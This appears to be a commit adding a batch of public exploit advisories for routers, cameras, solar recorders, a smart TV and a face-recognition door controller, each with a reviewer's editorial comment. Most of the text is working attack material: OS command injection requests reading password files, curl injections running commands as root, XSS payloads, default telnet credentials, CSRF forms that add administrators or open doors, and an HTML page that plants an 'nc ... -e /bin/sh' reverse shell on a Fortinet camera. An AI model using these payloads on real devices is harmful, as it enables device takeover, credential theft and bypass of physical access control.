[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote or local authenticated attackers.
there is no input validation on the POST Form Data Parameter "configBackup"
and the Form Data Parameter "downloadServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot3.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=config_save HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 114
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_save
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
check_tftp=up&configBackup=;whoami;whoami;.xml&downloadServerip=;cat /var/passwd;cat /var/passwd
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
sh: .xml: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Upgrade Firmware)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=upgrade
Vulnerable POST Form Data Parameter:
[+] firmwareRestore
[+] firmwareServerip
===========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
there is no input validation on the POST Form Data Parameter "firmwareRestore"
and the Form Data Parameter "firmwareServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot1.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=upgrade HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 525
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: xxxxxxxxw
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=upgrade
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=PENcqbtRRuvmuZfPZnzuUddVIEAPADBp; clickedFolderFrameless=43%5E
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="optprotocol"
up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareRestore"
;whoami;whoami
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="firmwareServerip"
;cat /var/passwd;cat /var/passwd
------WebKitFormBoundaryBy0MsFaBOhdU6YJL
Content-Disposition: form-data; name="update.device.packet-capture.stop-capture"
up
------WebKitFormBoundaryBy0MsFaBOhdU6YJL--
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;etc...
----+Discovered By Raki Ben Hamouda----+
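Review bot: the three CVE IDs (CVE-2019-20499, CVE-2019-20500, CVE-2019-20501) are listed only under the first of the three advisories in this file (Restore Configuration); the Save Configuration and Upgrade Firmware sections carry no CVE line, so state which ID belongs to which endpoint. `Exploitation Technique: Local` contradicts the PoC in all three sections, which is an authenticated HTTP POST to `/admin.cgi` (the second section itself says "remote or local"); "Remote, authenticated" is the accurate label. The `Base Score (CVSS)` blocks are followed by a stray `===============` rule, the separator lines before `Device Firmware version` differ in length between sections, "attachement" should be "attachment", and the referenced Screenshot1-3.jpg files are not part of this commit, so the session logs are the only reproducible evidence and should be described as such.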

View file

@ -0,0 +1,88 @@
# Exploit Title: TL-WR840N v5 00000005
# Date: 5/10/2019
# Exploit Author: purnendu ghosh
# Vendor Homepage: https://www.tp-link.com/
# Software Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
# Category: Hardware
# Firmware Version:0.9.1 3.16 v0001.0 Build 171211 Rel.58800n
# Hardware Version:TL-WR840N v5 00000005
# Tested on: Windows 10
# CVE :CVE-2019-12195.
# Proof Of Concept:
TP-Link TL-WR840N v5 00000005 devices allow XSS via the network name. The attacker must
log into the router by breaking the password and going to the admin
login page by THC-HYDRA to get the network name. With an XSS payload,
the network name changed automatically and the internet connection was
disconnected. All the users become disconnected from
the internet.
------------------------------------------
[Additional Information]
To ensure your network to be safe from Renaming and internet disconnection.
------------------------------------------
[Vulnerability Type]
Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]
tp-link
------------------------------------------
[Affected Product Code Base]
router - TL-WR840N v5 00000005
------------------------------------------
[Affected Component]
Wi-Fi network configured through the router
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Denial of Service]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Logged in to the router by breaking the password and goes to the admin
login page by THC-HYDRA and got the network name. Using Burp Suite
professional version 1.7.32 captured the network name and selected XSS
payload against the name and started attacking .as a result the
network name changed automatically and internet connection was
disconnected in the network. All the users become disconnected from
internet.
------------------------------------------
[Discoverer]
purnendu ghosh
[Reference]
https://www.tp-link.com/us/security
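Review bot: the `Exploit Title` gives only the model (`TL-WR840N v5 00000005`) and not the vulnerability class; it should read along the lines of `TP-Link TL-WR840N v5 - Cross-Site Scripting` like the other entries. The Proof Of Concept section names no request, page or parameter, so the finding cannot be reproduced or verified from the text; the vulnerable field (per the summary, the network name) should be identified so a fix can be checked against it. Brute forcing the admin password with THC-HYDRA is a precondition, not part of the vulnerability, so `Attack Type: Remote` should say "Remote, authenticated", and the `[Additional Information]` line is a sentence fragment.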

View file

@ -0,0 +1,17 @@
# Exploit Title: AUO Solar Data Recorder - Stored XSS
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO Solar Data Recorder all versions prior to v1.3.0
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# 1. Description:
# In AUO Solar Data Recorder web page,
# user can modify the system settings by access the /protect/config.htm.
# Attackers can inject malicious XSS code in parameter "addr" of post data.
# The value of addr will be stored in database, so that cause a stored XSS vulnerability.
# 2. Proof of Concept:
# Browse http://<Your<http://%3cYour> Modem IP>/protect/config.htm
# Send this post data:
addr= "<script>alert(123)</script>&dhcp=1
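Review bot: the `Browse http://<Your<http://%3cYour> Modem IP>/protect/config.htm` line has been mangled by a mail client's auto-linking (the `<http://%3cYour>` fragment is not part of the URL) and should read `http://<Your Modem IP>/protect/config.htm`. The post data `addr= "<script>alert(123)</script>&dhcp=1` contains a stray space after `addr=` that would not be present in the form-encoded body a browser sends; show the encoded request or drop the space. No CVE is listed, although the companion Incorrect Access Control entry for the same product cites CVE-2019-11367.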

View file

@ -0,0 +1,19 @@
# Exploit Title: Carel pCOWeb - Stored XSS
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.carel.com/
# Version: Carel pCOWeb all versions prior to B1.2.1
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
# 1. Description:
# In Carel pCOWeb web page,
# user can modify the system configuration by access the /config/pw_snmp.html.
# Attackers can inject malicious XSS code in post data.
# The XSS code will be stored in database, so that cause a stored XSS vulnerability.
# 2. Proof of Concept:
# Browse http://<Your<http://%3cYour> Modem IP>/config/pw_snmp.html
# Send this post data:
%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
# The post data in URL decode format is:
?script:setdb('snmp','syscontact')="><script>alert(123)</script>
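Review bot: the same auto-link mangling appears on the `Browse` line (`http://<Your<http://%3cYour> Modem IP>`), which should be `http://<Your Modem IP>/config/pw_snmp.html`. The decoded form `?script:setdb('snmp','syscontact')=...` shows that the parameter name is itself a `setdb` directive naming the `snmp` / `syscontact` setting; the description should say this explicitly, since it explains where the value is stored and why it is later rendered back to every viewer of the page. No CVE is listed.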

View file

@ -0,0 +1,16 @@
# Exploit Title: Carel pCOWeb - Unprotected Storage of Credentials
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.carel.com/
# Version: Carel pCOWeb all versions prior to B1.2.1
# Tested on: It is a proprietary devices: http://www.carel.com/product/pcoweb-card
# 1. Description:
# The devices, Carel pCOWeb, store plaintext passwords,
# which may allow sensitive information to be read by someone with access to the device.
# 2. Proof of Concept:
# Browse the maintain user page in website:
# http://<Your<http://%3cYour> Modem IP>/config/pw_changeusers.html
# The user's information include Description, Username and Password.
# In user page, we can find out that user passwords stored in plaintext.
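Review bot: the `Browse` URL is mangled here too (`http://<Your<http://%3cYour> Modem IP>/config/pw_changeusers.html`). The description's "someone with access to the device" reads as physical access, but the PoC is the web page `/config/pw_changeusers.html`, so the actual issue is that the management UI echoes every account's password in clear; the expected fix is to store passwords hashed and never render them back (masked fields only). "It is a proprietary devices" should be "device".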

View file

@ -0,0 +1,20 @@
# Exploit Title: AUO Solar Data Recorder - Incorrect Access Control
# Date: 2019-04-16
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.auo.com/zh-TW
# Version: AUO Solar Data Recorder all versions prior to v1.3.0
# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
# CVE: CVE-2019-11367
# 1. Description:
# In AUO Solar Data Recorder web page, it's use HTTP Basic Access Authentication.
# Once user access the files which are under path http://<host>/protect/,
# the website will response the plaintext account and password in WWW-Authenticate attribute.
# Attackers is capable to login AUO Solar Data Recorder successfully.
# 2. Proof of Concept:
# Access the files which are under path http://<host>/protect/ of AUO Solar Data Recorder.
# The website use HTTP Basic Access Authentication,
# and response the plaintext account and password in WWW-Authenticate attribute.
# By using the account and password in HTTP response,
# anyone can login AUO Solar Data Recorder successfully.
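Review bot: the claim that the server returns the account and password inside the `WWW-Authenticate` header is unusual enough that the actual response (at least the `WWW-Authenticate:` line, with the secret masked) should be included as evidence; the Proof of Concept currently just restates the Description. Grammar: `it's use HTTP Basic Access Authentication` should be `it uses`, and `Attackers is capable to login` should be `An attacker is then able to log in`.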

View file

@ -0,0 +1,59 @@
Exploit Title: Remote file inclusion
# Date: 03-06-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://supra.ru
# Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/
# CVE: CVE-2019-12477
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-12477
# https://www.inputzero.io/2019/06/hacking-smart-tv.html
Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL
function, which allows a local attacker to broadcast fake video without any
authentication via a /remote/media_control?action=setUri&uri=URI
Technical Observation:
We are abusing `openLiveURL()` which allows a local attacker to broadcast
video on supra smart cloud TV. I found this vulnerability initially by
source code review and then by crawling the application and reading every
request helped me to trigger this vulnerability.
Vulnerable code:
function openLiveTV(url)
{
$.get("/remote/media_control",
{m_action:'setUri',m_uri:url,m_type:'video/*'},
function (data, textStatus){
if("success"==textStatus){
alert(textStatus);
}else
{
alert(textStatus);
}
});
}
Vulnerable request:
GET /remote/media_control?action=setUri&uri=
http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
To trigger the vulnerability you can send a crafted request to the URL,
http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8
Although the above mention URL takes (.m3u8) format based video. We can use
`curl -v -X GET` to send such request, typically this is an unauth remote
file inclusion. An attacker could broadcast any video without any
authentication, the worst case attacker could leverage this vulnerability
to broadcast a fake emergency message.
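Review bot: the quoted code and the request do not match the summary: the function shown is `openLiveTV(url)` sending `m_action`/`m_uri`/`m_type`, while the title, summary and request use `openLiveURL` and `action=setUri&uri=`; either both variants exist on the device (say so) or one of them is wrong. The first line `Exploit Title: Remote file inclusion` is missing its leading `#` and the product name (`Supra Smart Cloud TV - Remote File Inclusion`), and "local attacker" in the summary contradicts "unauth remote file inclusion" in the closing paragraph; the accurate statement is that `/remote/media_control` is unauthenticated and reachable by anyone on the TV's network segment.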

View file

@ -0,0 +1,27 @@
1. Advisory Information
========================================
Title: Clever Dog Smart Camera
Vendor Homepage: http://www.cleverdog.com.cn/
Tested on Camera types : DOG-2W, DOG-2W-V4
Vulnerability: Hardware- Multiple Vulnerabilities
Date: 14/06/2019
Author: Alex Akinbi Twitter: @alexakinbi
1. Unauthenticated file disclosure:
========================================
An attacker on the local network has unauthenticated access to the internal SD card via HTTP service on port 8000. The HTTP web server on the camera allows an attacker to download video archive recorded and saved on the external memory card attached.
For example: http://192.168.1.81:8000/20190606
2. Telnet Backdoor using default credentials:
========================================
An attacker on the network can login remotely to the camera and gain root access. The device ships with hard-coded credentials, accessible from a telnet login prompt using credentials username: " root" and password: "12345678". These credentials work on all devices.
3. Login password sent over network unencrypted using Clever Dog App:
========================================
Using a packet sniffer, an attacker on the same network can capture data packets and view
captured user login password MD5 hash. A weak password can be cracked and used to login to the user account.
4. SOLUTION
========================================
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
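Review bot: both `1. Advisory Information` and `1. Unauthenticated file disclosure` are numbered 1, so the findings are off by one. In finding 2 the telnet username is given as `" root"` with a leading space; confirm whether that is intended or a typo for `"root"`. Finding 3's heading says the password is sent "unencrypted" while the body says an MD5 hash is captured; these are different findings (cleartext versus an unsalted hash sent over plaintext HTTP) and the text should say which it is. No CVE IDs and no vendor response are recorded under SOLUTION.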

View file

@ -0,0 +1,60 @@
# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
# Date: 2019-06-19
# Exploit Author: @XORcat
# Vendor Homepage: https://fortinet.com/
# Software Link: Customer Account Required
# Version: v1.2.0.0
# Tested on: Linux
# CVE : TBA
<html>
<!-- FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat)
Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/
Follow the following steps to demonstrate this PoC:
1. Replace IP addresses in Javascript code to repr esent your testing
environment.
2. Launch a `netcat` listener on the attacker's host using `nc -nvlp
1337`
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
* Note: all modern browsers will cache Basic Authentication
credentials (such as those used by the FCM-MB40) even if the
FCM-MB40's administration page is closed.
4. Open the crafted HTML document using the "admin" user's
browser.
* Note: In an attack scenario, this step would be performed by
implanting the code into a legitimate webpage that the "admin"
user visits, or by tricking the "admin" user into opening a page
which includes the code.
5. Note that the `netcat` listener established in step 2. has received
a connection from the camera, and that it is presenting a `/bin/sh`
session as root.
* Note: type `id` in the `netcat` connection to verify this.
_Note: After this issue has been exploited, the state of the system will
have changed, and future exploitation attempts may require
modification._
-->
<head>
<script>
const sleep = (milliseconds) => {
return new Promise(resolve => setTimeout(resolve, milliseconds))
};
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';
var sed_img = document.createElement("img");
sed_img.src = sed_url;
sleep(400).then(() => {
var execute_img = document.createElement("img");
execute_img.src = execute_url;
});
</script>
</head>
<body>
<h1>Welcome to my non-malicious website.</h1>
</body>
</html>
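Review bot: "repr esent" in step 1 of the comment is split by a stray space. `CVE : TBA` is a placeholder that should be updated once an ID is assigned, and `Software Link: Customer Account Required` would be more useful with the vendor's product page. The `_Note: After this issue has been exploited, the state of the system will have changed_` warning belongs before step 1 rather than after step 5, since the first image request already modifies `ddns.cgi` on the device and a tester should know that before running the page.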

View file

@ -0,0 +1,123 @@
FaceSentry Access Control System 6.4.8 Remote Command Injection
Vendor: iWT Ltd.
Product web page: http://www.iwt.com.hk
Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
Firmware 5.7.2 build 568 (Algorithm A14)
Firmware 5.7.0 build 539 (Algorithm A14)
Summary: FaceSentry 5AN is a revolutionary smart identity
management appliance that offers entry via biometric face
identification, contactless smart card, staff ID, or QR-code.
The QR-code upgrade allows you to share an eKey with guests
while you're away from your Office and monitor all activity
via the web administration tool. Powered by standard PoE
(Power over Ethernet), FaceSEntry 5AN can be installed in
minutes with only 6 screws. FaceSentry 5AN is a true enterprise
grade access control or time-and-attendance appliance.
Desc: FaceSentry suffers from an authenticated OS command
injection vulnerability using default credentials. This can
be exploited to inject and execute arbitrary shell commands
as the root user via the 'strInIP' and 'strInPort' parameters
(POST) in pingTest and tcpPortTest PHP scripts.
==============================================================
/pingTest.php:
--------------
8: if (!isAuth('TestTools','R')){
9: echo "No Permission";
10: include("footer.php");
11: exit;
12: }
13:
14: if(isset($_POST["strInIP"])){
15: $strInIP = $_POST["strInIP"];
16: }else{
17: $strInIP = "";
18: }
19:
20: $strOperationResult = "";
21: if ($strInIP != ""){
22:
23: $out = array();
24: exec("sudo ping -c 4 $strInIP",$out);
25: $result = "";
26: foreach($out as $line){
27: $result = $result.$line."<br>";
28: }
--------------------------------------------------------------
/tcpPortTest.php:
-----------------
14: if (isset($_POST["strInIP"])){
15: $strInIP = $_POST["strInIP"];
16: }else{
17: $strInIP = "";
18: }
19: if (isset($_POST["strInPort"])){
20: $strInPort = $_POST["strInPort"];
21: }else{
22: $strInPort = "";
23: }
..
..
53: $strOperationResult = "";
54: if ($strInIP != "" and $strInPort != ""){
55: $fp = fsockopen($strInIP, $strInPort, $errno, $errstr, 10);
56: system("date>>".TCP_PORT_TEST);
57: if (!$fp) {
58: $strOperationResult = getDisplay("TestTools.TCPPortTestFail")." $errstr ($errno)";
59: system("echo -e \"Unable to connect to $strInIP:$strInPort\">>".TCP_PORT_TEST);
60: } else {
61: fclose($fp);
62: $strOperationResult = getDisplay("TestTools.TCPPortTestSucces");
63: system("echo -e \"Successfully connected to $strInIP:$strInPort\">>".TCP_PORT_TEST);
64: }
65: }
==============================================================
Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
Linux 3.4.113-sun8i (armv7l)
PHP/7.0.30-0ubuntu0.16.04.1
PHP/7.0.22-0ubuntu0.16.04.1
lighttpd/1.4.35
Armbian 5.38
Sunxi Linux (sun8i generation)
Orange Pi PC +
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5523
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5523.php
28.05.2019
--
$ curl -X POST 'http://192.168.11.1/tcpPortTest.php' \
--data 'strInIP=1.2.3.4`sudo id > garbage.txt`&strInPort=80' \
-H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3'
$ curl http://192.168.11.1/garbage.txt
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------------------------------------
$ curl -X POST 'http://192.168.11.1/pingTest.php' \
--data 'strInIP=;sudo id' \
-H 'Cookie: PHPSESSID=21t4idf15fnkd61rerql9al4n3' \
|grep uid
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 7726 0 7697 100 29 10180 38 --:--:-- --:--:-- --:--:-- 10181
<font color='red'>Ping Test Fail! (;sudo id)<br>uid=0(root) gid=0(root) groups=0(root)<br></font><div id="six_tab_pages_nav" class="six_tab_pages_nav">
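Review bot: the `pingTest.php` listing starts at the `isAuth('TestTools','R')` gate on line 8, but the `tcpPortTest.php` listing starts at line 14, so the reader cannot tell whether it has the same permission check; include its lines 1-13 or say so, since the title says "Remote Command Injection" and the description says "authenticated ... using default credentials". On the defect itself, line 24 (`exec("sudo ping -c 4 $strInIP",$out)`) and lines 59 and 63 (`system("echo -e \"...$strInIP:$strInPort\">>"...)`) interpolate POST input straight into a shell string; the fix is to validate `strInIP` as an IP address and `strInPort` as an integer, pass them through `escapeshellarg()`, and drop the `sudo` so that any residual bypass runs as the web server user rather than root. No CVE is recorded.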

View file

@ -0,0 +1,148 @@
FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery
Vendor: iWT Ltd.
Product web page: http://www.iwt.com.hk
Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
Firmware 5.7.2 build 568 (Algorithm A14)
Firmware 5.7.0 build 539 (Algorithm A14)
Summary: FaceSentry 5AN is a revolutionary smart identity
management appliance that offers entry via biometric face
identification, contactless smart card, staff ID, or QR-code.
The QR-code upgrade allows you to share an eKey with guests
while you're away from your Office and monitor all activity
via the web administration tool. Powered by standard PoE
(Power over Ethernet), FaceSEntry 5AN can be installed in
minutes with only 6 screws. FaceSentry 5AN is a true enterprise
grade access control or time-and-attendance appliance.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
Linux 3.4.113-sun8i (armv7l)
PHP/7.0.30-0ubuntu0.16.04.1
PHP/7.0.22-0ubuntu0.16.04.1
lighttpd/1.4.35
Armbian 5.38
Sunxi Linux (sun8i generation)
Orange Pi PC +
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5524
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5524.php
28.05.2019
--
CSRF change administrator password:
-----------------------------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/personalSetting.php" method="POST">
<input type="hidden" name="strInAction" value="updateUser" />
<input type="hidden" name="strInUserID" value="administrator" />
<input type="hidden" name="isChangePwd" value="1" />
<input type="hidden" name="strInLanguage" value="Eng" />
<input type="hidden" name="strInPassword" value="t00tw00t />
<input type="hidden" name="strInConfirmPassword" value="t00tw00t" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF add admin:
---------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/userList.php?" method="POST">
<input type="hidden" name="strInAction" value="addUser" />
<input type="hidden" name="strInUserID" value="Testinugs" />
<input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
<input type="hidden" name="strInDescription" value="CSRFd" />
<input type="hidden" name="strInLanguage" value="Eng" />
<input type="hidden" name="strInPassword" value="123123" />
<input type="hidden" name="strInConfirmPassword" value="123123" />
<input type="hidden" name="strInStatus" value="Active" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Change administrator password via different path:
-------------------------------------------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/userList.php?" method="POST">
<input type="hidden" name="strInAction" value="updateUser" />
<input type="hidden" name="strInPageNo" value="0" />
<input type="hidden" name="strInUserID" value="administrator" />
<input type="hidden" name="isChangePwd" value="1" />
<input type="hidden" name="strInDescription" value="Default&#32;Sys&#46;&#32;Admin" />
<input type="hidden" name="strInUserFunctionPermissionGroupID" value="Admin" />
<input type="hidden" name="strInLanguage" value="Eng" />
<input type="hidden" name="strInStatus" value="Active" />
<input type="hidden" name="strInPassword" value="123456" />
<input type="hidden" name="strInConfirmPassword" value="123456" />
<input type="hidden" name="strEditPageNo" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
Add special card:
-----------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/specialCard.php?" method="POST">
<input type="hidden" name="strInSpecialCardID" value="deadbeef" />
<input type="hidden" name="strInSpecialCardStatus" value="" />
<input type="hidden" name="strInSpecialCardEnrollHigh" value="1" />
<input type="hidden" name="strInSpecialCardEnrollLow" value="1" />
<input type="hidden" name="strInSpecialCardRescue" value="1" />
<input type="hidden" name="strInSpecialCardOpenDoor" value="1" />
<input type="hidden" name="strInSpecialCardReboot" value="1" />
<input type="hidden" name="strInSpecialCardShutDown" value="1" />
<input type="hidden" name="strInAction" value="addNewSpecialCard" />
<input type="hidden" name="strInPageNo" value="0" />
<input type="hidden" name="strEditPageNo" value="" />
<input type="hidden" name="strInNewSpecialCard" value="deadbeef" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF open door 0:
-----------------
<html>
<body>
<script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
<form action="http://192.168.11.1/openDoor.php?" method="POST">
<input type="hidden" name="strInAction" value="openDoor" />
<input type="hidden" name="strInPageNo" value="0" />
<input type="hidden" name="strInRestartAction" value="" />
<input type="hidden" name="strPanelIDRestart=" value="" />
<input type="hidden" name="strPanelRestartAction" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
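Review bot: the Desc section identifies the root cause ("without performing any validity checks to verify the requests") but the advisory stops there; it gives no vendor notification or fix status, and the Affected version list names three firmware builds (6.4.8 build 264, 5.7.2 build 568, 5.7.0 build 539) without saying whether any later build addresses the issue. Please add a "Fix" or "Vendor status" line, even if it reads "vendor not responding", so readers of the header know whether a patched firmware exists or whether they must rely on compensating controls at the web-administration layer. Minor: "FaceSEntry" in the Summary should read "FaceSentry", and the Tested on block lists two kernels and two PHP versions without pairing each with the firmware build it was observed on.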
